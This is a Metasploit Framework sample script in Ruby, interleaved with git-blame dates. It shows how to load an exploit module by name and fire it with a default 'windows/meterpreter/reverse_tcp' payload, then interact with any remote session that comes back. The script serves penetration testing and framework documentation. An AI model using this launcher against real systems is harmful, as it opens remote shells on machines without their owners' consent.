2005-12-17 06:46:23 +00:00
|
|
|
#!/usr/bin/env ruby
|
2005-11-28 14:26:33 +00:00
|
|
|
#
|
2010-05-03 17:13:09 +00:00
|
|
|
# $Id$
|
|
|
|
#
|
2005-11-28 14:26:33 +00:00
|
|
|
# This sample demonstrates using the framework core directly to launch an
|
|
|
|
# exploit. It makes use of the simplified exploit wrapper method provided by
|
|
|
|
# the Msf::Simple::Exploit mixin.
|
|
|
|
#
|
2010-05-03 17:13:09 +00:00
|
|
|
# $Revision$
|
|
|
|
#
|
2005-11-28 14:26:33 +00:00
|
|
|
|
|
|
|
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
|
|
|
|
|
|
|
|
require 'msf/base'
|
|
|
|
|
|
|
|
if (ARGV.length == 0)
|
|
|
|
puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
|
|
|
|
exit
|
|
|
|
end
|
|
|
|
|
|
|
|
framework = Msf::Simple::Framework.create
|
|
|
|
exploit_name = ARGV.shift || 'test/multi/aggressive'
|
|
|
|
payload_name = ARGV.shift || 'windows/meterpreter/reverse_tcp'
|
|
|
|
input = Rex::Ui::Text::Input::Stdio.new
|
|
|
|
output = Rex::Ui::Text::Output::Stdio.new
|
|
|
|
|
|
|
|
begin
|
|
|
|
# Initialize the exploit instance
|
|
|
|
exploit = framework.exploits.create(exploit_name)
|
|
|
|
|
|
|
|
# Fire it off.
|
|
|
|
session = exploit.exploit_simple(
|
|
|
|
'Payload' => payload_name,
|
|
|
|
'OptionStr' => ARGV.join(' '),
|
|
|
|
'LocalInput' => input,
|
|
|
|
'LocalOutput' => output)
|
|
|
|
|
|
|
|
# If a session came back, try to interact with it.
|
|
|
|
if (session)
|
|
|
|
output.print_status("Session #{session.sid} created, interacting...")
|
|
|
|
output.print_line
|
|
|
|
|
|
|
|
session.init_ui(input, output)
|
|
|
|
|
|
|
|
session.interact
|
|
|
|
else
|
|
|
|
output.print_line("Exploit completed, no session was created.")
|
|
|
|
end
|
|
|
|
|
|
|
|
rescue
|
|
|
|
output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
|
|
|
|
end
|